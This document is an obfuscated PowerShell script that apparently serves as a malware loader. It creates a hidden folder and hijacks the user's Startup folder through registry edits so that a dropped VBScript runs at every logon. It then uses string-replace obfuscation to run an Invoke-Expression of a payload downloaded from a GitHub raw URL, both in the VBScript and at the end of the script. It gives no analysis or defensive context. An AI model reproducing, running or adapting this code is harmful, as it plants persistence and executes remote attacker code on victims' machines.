$FVYTFYTFYFYFYFYFGY="C:\UsTRYCTUVYIBUCRYCTUVYIBTCRYTUYic\Run".Replace("TRYCTUVYIBUCRYCTUVYIBTCRYTUY","ers\Publ")
$YGUYGNUHYGUYGYUGYGUYGYUG = "Cr######################ory".Replace("######################","eateDirect")
[system.io.directory]::$YGUYGNUHYGUYGYUGYGUYGYUG($FVYTFYTFYFYFYFYFGY)
start-sleep -s 5
$HIUHIUHJIUHUYUUIHYIUIUHI = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
$GVFHTFYUGRTYUGYFTFYYUH= "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$JYHGYUGUYGFYTFDTRDTRDFTR = "C:\Us--------------c\Run".Replace("--------------","ers\Publi")
$BFYHGTFYHFHUYGYU8YUYYUYG ="C------------blic\Run".Replace("------------",":\Users\Pu")

Set-ItemProperty -Path $HIUHIUHJIUHUYUUIHYIUIUHI -Name "Startup" -Value $JYHGYUGUYGFYTFDTRDTRDFTR;
Set-ItemProperty -Path $GVFHTFYUGRTYUGYFTFYYUH -Name "Startup" -Value $BFYHGTFYHFHUYGYU8YUYYUYG;
start-sleep -s 5
$Content = @'
Dim FBI
Set FBI= CreateObject("WScript.S"&"HELL")
Donal=chr(80) &"O" & Chr(87)
Trump = Chr(69)
mike = Chr(82) & "s"&"H" & Chr(69)
pompeo = Chr(76)
Elon =Chr(76)&" $TRUMP ='https://raw.githubusercontent.com/redxhawk/test/main/Server.txt';$"
WHO = "B ='E"
ERO = "TH COINt.WTF COINlIOSNT'.Re"
AA = "place('ETH COIN','nE').Repl"
BB = "ace('TF COIN','EbC').Rep"
CC = "lace('OS','e');"
MUSK = "$CC = 'DOS COIN L"&"SOSCOINnG'.Rep"
DD = "lace('S COIN ','Wn').Repl"
FF = "ace('SO','oaD').Rep"
GG = "lace('COIN','TrI');"
SHIB =""
INU ="$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Rep"
KK = "lace('os COIN','X(n`e').Repl"
TT = "ace('BTC COIN','-Ob').Rep"
ENB = "lace('TH COIN','`c`T');"
PUMP ="&('I'+'E"
OS = "X')($A -J"
SOS = "oin '')|&('I'+'E"
EOS = "X');"
COIN = Donal+Trump++mike+pompeo+Elon+WHO+ERO+AA+BB+CC+MUSK+DD+FF+GG+SHIB+INU+KK+TT+ENB+PUMP+OS+SOS+EOS+""
FBI.Run COIN,0
'@
Set-Content -Path C:\Users\Public\Run\Run.vbs -Value $Content

start-sleep -s 5

$TRUMP = 'https://raw.githubusercontent.com/redxhawk/test/main/Server.txt';
$B = 'ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');
$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');
$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');
&('I'+'EX')($A -Join '')|&('I'+'EX');